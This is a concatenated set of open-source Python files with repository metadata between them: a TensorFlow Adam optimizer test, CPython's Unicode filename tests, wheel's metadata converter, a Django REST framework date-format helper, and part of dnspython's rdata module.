beta1_power, beta2_power = opt._get_beta_accumulators()
# Run 3 steps of Adam
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
update.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
def testSharing(self):
for dtype in self.float_types:
with self.test_session(), self.test_scope():
variable_scope.get_variable_scope().set_use_resource(True)
# Initialize variables for numpy implementation.
m0, v0, m1, v1 = 0.0, 0.0, 0.0, 0.0
var0_np = np.array([1.0, 2.0], dtype=dtype)
grads0_np = np.array([0.1, 0.1], dtype=dtype)
var1_np = np.array([3.0, 4.0], dtype=dtype)
grads1_np = np.array([0.01, 0.01], dtype=dtype)
var0 = resource_variable_ops.ResourceVariable(var0_np)
var1 = resource_variable_ops.ResourceVariable(var1_np)
grads0 = array_ops.placeholder(dtype)
grads1 = array_ops.placeholder(dtype)
opt = adam.AdamOptimizer()
update1 = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
update2 = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
variables.global_variables_initializer().run()
beta1_power, beta2_power = opt._get_beta_accumulators()
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Run 3 steps of intertwined Adam1 and Adam2.
for t in range(1, 4):
self.assertAllCloseAccordingToType(0.9**t, beta1_power.eval())
self.assertAllCloseAccordingToType(0.999**t, beta2_power.eval())
if t % 2 == 0:
update1.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
else:
update2.run(feed_dict={grads0: grads0_np, grads1: grads1_np})
var0_np, m0, v0 = adam_update_numpy(var0_np, grads0_np, t, m0, v0)
var1_np, m1, v1 = adam_update_numpy(var1_np, grads1_np, t, m1, v1)
# Validate updated params
self.assertAllCloseAccordingToType(var0_np, var0.eval())
self.assertAllCloseAccordingToType(var1_np, var1.eval())
if __name__ == "__main__":
test.main()
|
apache-2.0
|
moto-timo/ironpython3
|
Src/StdLib/Lib/test/test_pep277.py
|
10
|
7007
|
# Test the Unicode versions of normal file functions
# open, os.open, os.stat, os.listdir, os.rename, os.remove, os.mkdir, os.chdir, os.rmdir
import os
import sys
import unittest
import warnings
from unicodedata import normalize
from test import support
filenames = [
'1_abc',
'2_ascii',
'3_Gr\xfc\xdf-Gott',
'4_\u0393\u03b5\u03b9\u03ac-\u03c3\u03b1\u03c2',
'5_\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435',
'6_\u306b\u307d\u3093',
'7_\u05d4\u05e9\u05e7\u05e6\u05e5\u05e1',
'8_\u66e8\u66e9\u66eb',
'9_\u66e8\u05e9\u3093\u0434\u0393\xdf',
    # Specific code points: fn, NFC(fn) and NFKC(fn) all different
'10_\u1fee\u1ffd',
]
# Mac OS X decomposes Unicode names, using Normal Form D.
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
# "However, most volume formats do not follow the exact specification for
# these normal forms. For example, HFS Plus uses a variant of Normal Form D
# in which U+2000 through U+2FFF, U+F900 through U+FAFF, and U+2F800 through
# U+2FAFF are not decomposed."
if sys.platform != 'darwin':
filenames.extend([
        # Specific code points: NFC(fn), NFD(fn), NFKC(fn) and NFKD(fn) all different
'11_\u0385\u03d3\u03d4',
'12_\u00a8\u0301\u03d2\u0301\u03d2\u0308', # == NFD('\u0385\u03d3\u03d4')
'13_\u0020\u0308\u0301\u038e\u03ab', # == NFKC('\u0385\u03d3\u03d4')
'14_\u1e9b\u1fc1\u1fcd\u1fce\u1fcf\u1fdd\u1fde\u1fdf\u1fed',
        # Specific code points: fn, NFC(fn) and NFKC(fn) all different
'15_\u1fee\u1ffd\ufad1',
'16_\u2000\u2000\u2000A',
'17_\u2001\u2001\u2001A',
'18_\u2003\u2003\u2003A', # == NFC('\u2001\u2001\u2001A')
'19_\u0020\u0020\u0020A', # '\u0020' == ' ' == NFKC('\u2000') ==
# NFKC('\u2001') == NFKC('\u2003')
])
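# For illustration, the equivalences claimed in the comments above can be
# checked directly with unicodedata.normalize (values taken from this file):
#     >>> normalize('NFD', '\u0385\u03d3\u03d4') == '\u00a8\u0301\u03d2\u0301\u03d2\u0308'
#     True
#     >>> normalize('NFKC', '\u0385\u03d3\u03d4') == '\u0020\u0308\u0301\u038e\u03ab'
#     True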
# Is it Unicode-friendly?
if not os.path.supports_unicode_filenames:
fsencoding = sys.getfilesystemencoding()
try:
for name in filenames:
name.encode(fsencoding)
except UnicodeEncodeError:
raise unittest.SkipTest("only NT+ and systems with "
"Unicode-friendly filesystem encoding")
class UnicodeFileTests(unittest.TestCase):
files = set(filenames)
normal_form = None
def setUp(self):
try:
os.mkdir(support.TESTFN)
except FileExistsError:
pass
self.addCleanup(support.rmtree, support.TESTFN)
files = set()
for name in self.files:
name = os.path.join(support.TESTFN, self.norm(name))
with open(name, 'wb') as f:
f.write((name+'\n').encode("utf-8"))
os.stat(name)
files.add(name)
self.files = files
def norm(self, s):
if self.normal_form:
return normalize(self.normal_form, s)
return s
def _apply_failure(self, fn, filename,
expected_exception=FileNotFoundError,
check_filename=True):
with self.assertRaises(expected_exception) as c:
fn(filename)
exc_filename = c.exception.filename
if check_filename:
            self.assertEqual(exc_filename, filename, "Function '%s(%a)' failed "
"with bad filename in the exception: %a" %
(fn.__name__, filename, exc_filename))
def test_failures(self):
# Pass non-existing Unicode filenames all over the place.
for name in self.files:
name = "not_" + name
self._apply_failure(open, name)
self._apply_failure(os.stat, name)
self._apply_failure(os.chdir, name)
self._apply_failure(os.rmdir, name)
self._apply_failure(os.remove, name)
self._apply_failure(os.listdir, name)
if sys.platform == 'win32':
# Windows is lunatic. Issue #13366.
_listdir_failure = NotADirectoryError, FileNotFoundError
else:
_listdir_failure = NotADirectoryError
def test_open(self):
for name in self.files:
f = open(name, 'wb')
f.write((name+'\n').encode("utf-8"))
f.close()
os.stat(name)
self._apply_failure(os.listdir, name, self._listdir_failure)
    # Skip the test on darwin, because darwin normalizes filenames to NFD
    # (a variant of the Unicode NFD form). Normalizing the filename to NFC,
    # NFKC or NFKD in Python is useless, because darwin will normalize it
    # again later, so open(), os.stat(), etc. don't raise any exception.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_normalize(self):
files = set(self.files)
others = set()
for nf in set(['NFC', 'NFD', 'NFKC', 'NFKD']):
others |= set(normalize(nf, file) for file in files)
others -= files
for name in others:
self._apply_failure(open, name)
self._apply_failure(os.stat, name)
self._apply_failure(os.chdir, name)
self._apply_failure(os.rmdir, name)
self._apply_failure(os.remove, name)
self._apply_failure(os.listdir, name)
    # Skip the test on darwin, because darwin uses a normalization different
    # from Python's NFD normalization: the filenames are different even if we
    # apply Python NFD normalization ourselves.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_listdir(self):
sf0 = set(self.files)
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
f1 = os.listdir(support.TESTFN.encode(sys.getfilesystemencoding()))
f2 = os.listdir(support.TESTFN)
sf2 = set(os.path.join(support.TESTFN, f) for f in f2)
self.assertEqual(sf0, sf2, "%a != %a" % (sf0, sf2))
self.assertEqual(len(f1), len(f2))
def test_rename(self):
for name in self.files:
os.rename(name, "tmp")
os.rename("tmp", name)
def test_directory(self):
dirname = os.path.join(support.TESTFN, 'Gr\xfc\xdf-\u66e8\u66e9\u66eb')
filename = '\xdf-\u66e8\u66e9\u66eb'
with support.temp_cwd(dirname):
with open(filename, 'wb') as f:
f.write((filename + '\n').encode("utf-8"))
os.access(filename,os.R_OK)
os.remove(filename)
class UnicodeNFCFileTests(UnicodeFileTests):
normal_form = 'NFC'
class UnicodeNFDFileTests(UnicodeFileTests):
normal_form = 'NFD'
class UnicodeNFKCFileTests(UnicodeFileTests):
normal_form = 'NFKC'
class UnicodeNFKDFileTests(UnicodeFileTests):
normal_form = 'NFKD'
def test_main():
support.run_unittest(
UnicodeFileTests,
UnicodeNFCFileTests,
UnicodeNFDFileTests,
UnicodeNFKCFileTests,
UnicodeNFKDFileTests,
)
if __name__ == "__main__":
test_main()
|
apache-2.0
|
bzennn/blog_flask
|
python/lib/python3.5/site-packages/wheel/metadata.py
|
62
|
11561
|
"""
Tools for converting old- to new-style metadata.
"""
import email.parser
import os.path
import re
import textwrap
from collections import namedtuple, OrderedDict
import pkg_resources
from . import __version__ as wheel_version
from .pkginfo import read_pkg_info
from .util import OrderedDefaultDict
METADATA_VERSION = "2.0"
PLURAL_FIELDS = {"classifier": "classifiers",
"provides_dist": "provides",
"provides_extra": "extras"}
SKIP_FIELDS = set()
CONTACT_FIELDS = (({"email": "author_email", "name": "author"},
"author"),
({"email": "maintainer_email", "name": "maintainer"},
"maintainer"))
# commonly filled out as "UNKNOWN" by distutils:
UNKNOWN_FIELDS = {"author", "author_email", "platform", "home_page", "license"}
# Wheel itself is probably the only program that uses non-extras markers
# in METADATA/PKG-INFO. Support its syntax with the extra at the end only.
EXTRA_RE = re.compile("""^(?P<package>.*?)(;\s*(?P<condition>.*?)(extra == '(?P<extra>.*?)')?)$""")
KEYWORDS_RE = re.compile("[\0-,]+")
MayRequiresKey = namedtuple('MayRequiresKey', ('condition', 'extra'))
def unique(iterable):
"""
Yield unique values in iterable, preserving order.
"""
seen = set()
for value in iterable:
if value not in seen:
seen.add(value)
yield value
def handle_requires(metadata, pkg_info, key):
"""
Place the runtime requirements from pkg_info into metadata.
"""
may_requires = OrderedDefaultDict(list)
for value in sorted(pkg_info.get_all(key)):
extra_match = EXTRA_RE.search(value)
if extra_match:
groupdict = extra_match.groupdict()
condition = groupdict['condition']
extra = groupdict['extra']
package = groupdict['package']
if condition.endswith(' and '):
condition = condition[:-5]
else:
condition, extra = None, None
package = value
key = MayRequiresKey(condition, extra)
may_requires[key].append(package)
if may_requires:
metadata['run_requires'] = []
def sort_key(item):
# Both condition and extra could be None, which can't be compared
# against strings in Python 3.
key, value = item
if key.condition is None:
return ''
return key.condition
for key, value in sorted(may_requires.items(), key=sort_key):
may_requirement = OrderedDict((('requires', value),))
if key.extra:
may_requirement['extra'] = key.extra
if key.condition:
may_requirement['environment'] = key.condition
metadata['run_requires'].append(may_requirement)
if 'extras' not in metadata:
metadata['extras'] = []
metadata['extras'].extend([key.extra for key in may_requires.keys() if key.extra])
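# For example (hypothetical PKG-INFO content), a line such as
#     Requires-Dist: requests (>=2.0); python_version < "3" and extra == 'security'
# is split by EXTRA_RE into package "requests (>=2.0)", condition
# 'python_version < "3"' (the trailing " and " is stripped above) and extra
# 'security', and ends up in metadata['run_requires'] as an entry like
#     {'requires': ['requests (>=2.0)'], 'extra': 'security',
#      'environment': 'python_version < "3"'}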
def pkginfo_to_dict(path, distribution=None):
"""
Convert PKG-INFO to a prototype Metadata 2.0 (PEP 426) dict.
The description is included under the key ['description'] rather than
being written to a separate file.
path: path to PKG-INFO file
distribution: optional distutils Distribution()
"""
metadata = OrderedDefaultDict(
lambda: OrderedDefaultDict(lambda: OrderedDefaultDict(OrderedDict)))
metadata["generator"] = "bdist_wheel (" + wheel_version + ")"
try:
unicode
pkg_info = read_pkg_info(path)
except NameError:
with open(path, 'rb') as pkg_info_file:
pkg_info = email.parser.Parser().parsestr(pkg_info_file.read().decode('utf-8'))
description = None
if pkg_info['Summary']:
metadata['summary'] = pkginfo_unicode(pkg_info, 'Summary')
del pkg_info['Summary']
if pkg_info['Description']:
description = dedent_description(pkg_info)
del pkg_info['Description']
else:
payload = pkg_info.get_payload()
if isinstance(payload, bytes):
# Avoid a Python 2 Unicode error.
# We still suffer ? glyphs on Python 3.
payload = payload.decode('utf-8')
if payload:
description = payload
if description:
pkg_info['description'] = description
for key in sorted(unique(k.lower() for k in pkg_info.keys())):
low_key = key.replace('-', '_')
if low_key in SKIP_FIELDS:
continue
if low_key in UNKNOWN_FIELDS and pkg_info.get(key) == 'UNKNOWN':
continue
if low_key in sorted(PLURAL_FIELDS):
metadata[PLURAL_FIELDS[low_key]] = pkg_info.get_all(key)
elif low_key == "requires_dist":
handle_requires(metadata, pkg_info, key)
elif low_key == 'provides_extra':
if 'extras' not in metadata:
metadata['extras'] = []
metadata['extras'].extend(pkg_info.get_all(key))
elif low_key == 'home_page':
metadata['extensions']['python.details']['project_urls'] = {'Home': pkg_info[key]}
elif low_key == 'keywords':
metadata['keywords'] = KEYWORDS_RE.split(pkg_info[key])
else:
metadata[low_key] = pkg_info[key]
metadata['metadata_version'] = METADATA_VERSION
if 'extras' in metadata:
metadata['extras'] = sorted(set(metadata['extras']))
# include more information if distribution is available
if distribution:
for requires, attr in (('test_requires', 'tests_require'),):
try:
requirements = getattr(distribution, attr)
if isinstance(requirements, list):
new_requirements = sorted(convert_requirements(requirements))
metadata[requires] = [{'requires': new_requirements}]
except AttributeError:
pass
# handle contacts
contacts = []
for contact_type, role in CONTACT_FIELDS:
contact = OrderedDict()
for key in sorted(contact_type):
if contact_type[key] in metadata:
contact[key] = metadata.pop(contact_type[key])
if contact:
contact['role'] = role
contacts.append(contact)
if contacts:
metadata['extensions']['python.details']['contacts'] = contacts
# convert entry points to exports
try:
with open(os.path.join(os.path.dirname(path), "entry_points.txt"), "r") as ep_file:
ep_map = pkg_resources.EntryPoint.parse_map(ep_file.read())
exports = OrderedDict()
for group, items in sorted(ep_map.items()):
exports[group] = OrderedDict()
for item in sorted(map(str, items.values())):
name, export = item.split(' = ', 1)
exports[group][name] = export
if exports:
metadata['extensions']['python.exports'] = exports
except IOError:
pass
# copy console_scripts entry points to commands
if 'python.exports' in metadata['extensions']:
for (ep_script, wrap_script) in (('console_scripts', 'wrap_console'),
('gui_scripts', 'wrap_gui')):
if ep_script in metadata['extensions']['python.exports']:
metadata['extensions']['python.commands'][wrap_script] = \
metadata['extensions']['python.exports'][ep_script]
return metadata
def requires_to_requires_dist(requirement):
"""Compose the version predicates for requirement in PEP 345 fashion."""
requires_dist = []
for op, ver in requirement.specs:
requires_dist.append(op + ver)
if not requires_dist:
return ''
return " (%s)" % ','.join(sorted(requires_dist))
def convert_requirements(requirements):
"""Yield Requires-Dist: strings for parsed requirements strings."""
for req in requirements:
parsed_requirement = pkg_resources.Requirement.parse(req)
spec = requires_to_requires_dist(parsed_requirement)
extras = ",".join(parsed_requirement.extras)
if extras:
extras = "[%s]" % extras
yield (parsed_requirement.project_name + extras + spec)
def generate_requirements(extras_require):
"""
Convert requirements from a setup()-style dictionary to ('Requires-Dist', 'requirement')
and ('Provides-Extra', 'extra') tuples.
extras_require is a dictionary of {extra: [requirements]} as passed to setup(),
using the empty extra {'': [requirements]} to hold install_requires.
"""
for extra, depends in extras_require.items():
condition = ''
if extra and ':' in extra: # setuptools extra:condition syntax
extra, condition = extra.split(':', 1)
extra = pkg_resources.safe_extra(extra)
if extra:
yield ('Provides-Extra', extra)
if condition:
condition += " and "
condition += "extra == '%s'" % extra
if condition:
condition = '; ' + condition
for new_req in convert_requirements(depends):
yield ('Requires-Dist', new_req + condition)
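# For example, given a hypothetical setup()-style mapping
#     {'security:python_version<"3"': ['pyOpenSSL']}
# generate_requirements() yields ('Provides-Extra', 'security') followed by
#     ('Requires-Dist', 'pyOpenSSL; python_version<"3" and extra == \'security\'')
# with the requirement string itself produced by convert_requirements().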
def pkginfo_to_metadata(egg_info_path, pkginfo_path):
"""
Convert .egg-info directory with PKG-INFO to the Metadata 1.3 aka
old-draft Metadata 2.0 format.
"""
pkg_info = read_pkg_info(pkginfo_path)
pkg_info.replace_header('Metadata-Version', '2.0')
requires_path = os.path.join(egg_info_path, 'requires.txt')
if os.path.exists(requires_path):
with open(requires_path) as requires_file:
requires = requires_file.read()
for extra, reqs in sorted(pkg_resources.split_sections(requires),
key=lambda x: x[0] or ''):
for item in generate_requirements({extra: reqs}):
pkg_info[item[0]] = item[1]
description = pkg_info['Description']
if description:
pkg_info.set_payload(dedent_description(pkg_info))
del pkg_info['Description']
return pkg_info
def pkginfo_unicode(pkg_info, field):
"""Hack to coax Unicode out of an email Message() - Python 3.3+"""
text = pkg_info[field]
field = field.lower()
if not isinstance(text, str):
if not hasattr(pkg_info, 'raw_items'): # Python 3.2
return str(text)
for item in pkg_info.raw_items():
if item[0].lower() == field:
text = item[1].encode('ascii', 'surrogateescape') \
.decode('utf-8')
break
return text
def dedent_description(pkg_info):
"""
Dedent and convert pkg_info['Description'] to Unicode.
"""
description = pkg_info['Description']
# Python 3 Unicode handling, sorta.
surrogates = False
if not isinstance(description, str):
surrogates = True
description = pkginfo_unicode(pkg_info, 'Description')
description_lines = description.splitlines()
description_dedent = '\n'.join(
# if the first line of long_description is blank,
# the first line here will be indented.
(description_lines[0].lstrip(),
textwrap.dedent('\n'.join(description_lines[1:])),
'\n'))
if surrogates:
description_dedent = description_dedent \
.encode("utf8") \
.decode("ascii", "surrogateescape")
return description_dedent
if __name__ == "__main__":
import sys
import pprint
pprint.pprint(pkginfo_to_dict(sys.argv[1]))
|
gpl-3.0
|
kezabelle/django-rest-framework
|
rest_framework/utils/humanize_datetime.py
|
144
|
1285
|
"""
Helper functions that convert strftime formats into more readable representations.
"""
from rest_framework import ISO_8601
def datetime_formats(formats):
format = ', '.join(formats).replace(
ISO_8601,
'YYYY-MM-DDThh:mm[:ss[.uuuuuu]][+HH:MM|-HH:MM|Z]'
)
return humanize_strptime(format)
def date_formats(formats):
format = ', '.join(formats).replace(ISO_8601, 'YYYY[-MM[-DD]]')
return humanize_strptime(format)
def time_formats(formats):
format = ', '.join(formats).replace(ISO_8601, 'hh:mm[:ss[.uuuuuu]]')
return humanize_strptime(format)
def humanize_strptime(format_string):
# Note that we're missing some of the locale specific mappings that
# don't really make sense.
mapping = {
"%Y": "YYYY",
"%y": "YY",
"%m": "MM",
"%b": "[Jan-Dec]",
"%B": "[January-December]",
"%d": "DD",
"%H": "hh",
"%I": "hh", # Requires '%p' to differentiate from '%H'.
"%M": "mm",
"%S": "ss",
"%f": "uuuuuu",
"%a": "[Mon-Sun]",
"%A": "[Monday-Sunday]",
"%p": "[AM|PM]",
"%z": "[+HHMM|-HHMM]"
}
for key, val in mapping.items():
format_string = format_string.replace(key, val)
return format_string
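# A minimal usage sketch (hypothetical format strings):
#     >>> humanize_strptime('%Y-%m-%d %H:%M')
#     'YYYY-MM-DD hh:mm'
#     >>> date_formats(['%Y-%m-%d'])
#     'YYYY-MM-DD'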
|
bsd-2-clause
|
antsant/namebench
|
nb_third_party/dns/rdata.py
|
215
|
14860
|
# Copyright (C) 2001-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS rdata.
@var _rdata_modules: A dictionary mapping a (rdclass, rdtype) tuple to
the module which implements that type.
@type _rdata_modules: dict
@var _module_prefix: The prefix to use when forming module names. The
default is 'dns.rdtypes'. Changing this value will break the library.
@type _module_prefix: string
@var _hex_chunksize: At most this many octets will be represented in each
chunk of hexstring that _hexify() produces before whitespace occurs.
@type _hex_chunksize: int"""
import cStringIO
import dns.exception
import dns.rdataclass
import dns.rdatatype
import dns.tokenizer
_hex_chunksize = 32
def _hexify(data, chunksize=None):
"""Convert a binary string into its hex encoding, broken up into chunks
of I{chunksize} characters separated by a space.
@param data: the binary string
@type data: string
@param chunksize: the chunk size. Default is L{dns.rdata._hex_chunksize}
@rtype: string
"""
if chunksize is None:
chunksize = _hex_chunksize
hex = data.encode('hex_codec')
l = len(hex)
if l > chunksize:
chunks = []
i = 0
while i < l:
chunks.append(hex[i : i + chunksize])
i += chunksize
hex = ' '.join(chunks)
return hex
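# For example (under the Python 2 str-as-bytes semantics this module assumes):
#     >>> _hexify('\x01\x02\x03')
#     '010203'
# Output longer than _hex_chunksize hex digits is broken into
# space-separated chunks.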
_base64_chunksize = 32
def _base64ify(data, chunksize=None):
"""Convert a binary string into its base64 encoding, broken up into chunks
of I{chunksize} characters separated by a space.
@param data: the binary string
@type data: string
@param chunksize: the chunk size. Default is
L{dns.rdata._base64_chunksize}
@rtype: string
"""
if chunksize is None:
chunksize = _base64_chunksize
b64 = data.encode('base64_codec')
b64 = b64.replace('\n', '')
l = len(b64)
if l > chunksize:
chunks = []
i = 0
while i < l:
chunks.append(b64[i : i + chunksize])
i += chunksize
b64 = ' '.join(chunks)
return b64
__escaped = {
'"' : True,
'\\' : True,
}
def _escapify(qstring):
"""Escape the characters in a quoted string which need it.
@param qstring: the string
@type qstring: string
@returns: the escaped string
@rtype: string
"""
text = ''
for c in qstring:
if c in __escaped:
text += '\\' + c
elif ord(c) >= 0x20 and ord(c) < 0x7F:
text += c
else:
text += '\\%03d' % ord(c)
return text
def _truncate_bitmap(what):
    """Determine the index of the greatest byte that isn't all zeros, and
    return the bitmap truncated to include all bytes up to and including
    that index.
@param what: a string of octets representing a bitmap.
@type what: string
@rtype: string
"""
for i in xrange(len(what) - 1, -1, -1):
if what[i] != '\x00':
break
return ''.join(what[0 : i + 1])
class Rdata(object):
"""Base class for all DNS rdata types.
"""
__slots__ = ['rdclass', 'rdtype']
def __init__(self, rdclass, rdtype):
"""Initialize an rdata.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
"""
self.rdclass = rdclass
self.rdtype = rdtype
def covers(self):
"""DNS SIG/RRSIG rdatas apply to a specific type; this type is
returned by the covers() function. If the rdata type is not
SIG or RRSIG, dns.rdatatype.NONE is returned. This is useful when
creating rdatasets, allowing the rdataset to contain only RRSIGs
of a particular type, e.g. RRSIG(NS).
@rtype: int
"""
return dns.rdatatype.NONE
def extended_rdatatype(self):
"""Return a 32-bit type value, the least significant 16 bits of
which are the ordinary DNS type, and the upper 16 bits of which are
the "covered" type, if any.
@rtype: int
"""
return self.covers() << 16 | self.rdtype
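    # For example, an RRSIG rdata (type 46) whose covers() returns
    # dns.rdatatype.NS (type 2) has an extended rdatatype of
    # (2 << 16) | 46 == 131118; ordinary rdatas keep just their 16-bit type.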
def to_text(self, origin=None, relativize=True, **kw):
"""Convert an rdata to text format.
@rtype: string
"""
raise NotImplementedError
def to_wire(self, file, compress = None, origin = None):
"""Convert an rdata to wire format.
@rtype: string
"""
raise NotImplementedError
def to_digestable(self, origin = None):
"""Convert rdata to a format suitable for digesting in hashes. This
is also the DNSSEC canonical form."""
f = cStringIO.StringIO()
self.to_wire(f, None, origin)
return f.getvalue()
def validate(self):
"""Check that the current contents of the rdata's fields are
valid. If you change an rdata by assigning to its fields,
it is a good idea to call validate() when you are done making
changes.
"""
dns.rdata.from_text(self.rdclass, self.rdtype, self.to_text())
def __repr__(self):
covers = self.covers()
if covers == dns.rdatatype.NONE:
ctext = ''
else:
ctext = '(' + dns.rdatatype.to_text(covers) + ')'
return '<DNS ' + dns.rdataclass.to_text(self.rdclass) + ' ' + \
dns.rdatatype.to_text(self.rdtype) + ctext + ' rdata: ' + \
str(self) + '>'
def __str__(self):
return self.to_text()
def _cmp(self, other):
"""Compare an rdata with another rdata of the same rdtype and
rdclass. Return < 0 if self < other in the DNSSEC ordering,
0 if self == other, and > 0 if self > other.
"""
raise NotImplementedError
def __eq__(self, other):
if not isinstance(other, Rdata):
return False
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return False
return self._cmp(other) == 0
def __ne__(self, other):
if not isinstance(other, Rdata):
return True
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return True
return self._cmp(other) != 0
def __lt__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) < 0
def __le__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) <= 0
def __ge__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) >= 0
def __gt__(self, other):
if not isinstance(other, Rdata) or \
self.rdclass != other.rdclass or \
self.rdtype != other.rdtype:
return NotImplemented
return self._cmp(other) > 0
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
"""Build an rdata object from text format.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param tok: The tokenizer
@type tok: dns.tokenizer.Tokenizer
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@param relativize: should names be relativized?
@type relativize: bool
@rtype: dns.rdata.Rdata instance
"""
raise NotImplementedError
from_text = classmethod(from_text)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
"""Build an rdata object from wire format
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param wire: The wire-format message
@type wire: string
        @param current: The offset in wire of the beginning of the rdata.
@type current: int
@param rdlen: The length of the wire-format rdata
@type rdlen: int
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@rtype: dns.rdata.Rdata instance
"""
raise NotImplementedError
from_wire = classmethod(from_wire)
def choose_relativity(self, origin = None, relativize = True):
"""Convert any domain names in the rdata to the specified
relativization.
"""
pass
class GenericRdata(Rdata):
    """Generic Rdata Class
This class is used for rdata types for which we have no better
implementation. It implements the DNS "unknown RRs" scheme.
"""
__slots__ = ['data']
def __init__(self, rdclass, rdtype, data):
super(GenericRdata, self).__init__(rdclass, rdtype)
self.data = data
def to_text(self, origin=None, relativize=True, **kw):
return r'\# %d ' % len(self.data) + _hexify(self.data)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
token = tok.get()
if not token.is_identifier() or token.value != '\#':
raise dns.exception.SyntaxError(r'generic rdata does not start with \#')
length = tok.get_int()
chunks = []
while 1:
token = tok.get()
if token.is_eol_or_eof():
break
chunks.append(token.value)
hex = ''.join(chunks)
data = hex.decode('hex_codec')
if len(data) != length:
raise dns.exception.SyntaxError('generic rdata hex data has wrong length')
return cls(rdclass, rdtype, data)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
file.write(self.data)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
return cls(rdclass, rdtype, wire[current : current + rdlen])
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.data, other.data)
_rdata_modules = {}
_module_prefix = 'dns.rdtypes'
def get_rdata_class(rdclass, rdtype):
def import_module(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
mod = _rdata_modules.get((rdclass, rdtype))
rdclass_text = dns.rdataclass.to_text(rdclass)
rdtype_text = dns.rdatatype.to_text(rdtype)
rdtype_text = rdtype_text.replace('-', '_')
if not mod:
mod = _rdata_modules.get((dns.rdatatype.ANY, rdtype))
if not mod:
try:
mod = import_module('.'.join([_module_prefix,
rdclass_text, rdtype_text]))
_rdata_modules[(rdclass, rdtype)] = mod
except ImportError:
try:
mod = import_module('.'.join([_module_prefix,
'ANY', rdtype_text]))
_rdata_modules[(dns.rdataclass.ANY, rdtype)] = mod
except ImportError:
mod = None
if mod:
cls = getattr(mod, rdtype_text)
else:
cls = GenericRdata
return cls
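# For example, get_rdata_class(dns.rdataclass.IN, dns.rdatatype.A) first looks
# for a dns.rdtypes.IN.A module, then falls back to dns.rdtypes.ANY.A, and
# finally returns GenericRdata if neither import succeeds.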
def from_text(rdclass, rdtype, tok, origin = None, relativize = True):
"""Build an rdata object from text format.
This function attempts to dynamically load a class which
implements the specified rdata class and type. If there is no
class-and-type-specific implementation, the GenericRdata class
is used.
Once a class is chosen, its from_text() class method is called
with the parameters to this function.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param tok: The tokenizer
@type tok: dns.tokenizer.Tokenizer
@param origin: The origin to use for relative names
@type origin: dns.name.Name
@param relativize: Should names be relativized?
@type relativize: bool
@rtype: dns.rdata.Rdata instance"""
if isinstance(tok, str):
tok = dns.tokenizer.Tokenizer(tok)
cls = get_rdata_class(rdclass, rdtype)
if cls != GenericRdata:
# peek at first token
token = tok.get()
tok.unget(token)
if token.is_identifier() and \
token.value == r'\#':
#
# Known type using the generic syntax. Extract the
# wire form from the generic syntax, and then run
# from_wire on it.
#
rdata = GenericRdata.from_text(rdclass, rdtype, tok, origin,
relativize)
return from_wire(rdclass, rdtype, rdata.data, 0, len(rdata.data),
origin)
return cls.from_text(rdclass, rdtype, tok, origin, relativize)
def from_wire(rdclass, rdtype, wire, current, rdlen, origin = None):
"""Build an rdata object from wire format
This function attempts to dynamically load a class which
implements the specified rdata class and type. If there is no
class-and-type-specific implementation, the GenericRdata class
is used.
Once a class is chosen, its from_wire() class method is called
with the parameters to this function.
@param rdclass: The rdata class
@type rdclass: int
@param rdtype: The rdata type
@type rdtype: int
@param wire: The wire-format message
@type wire: string
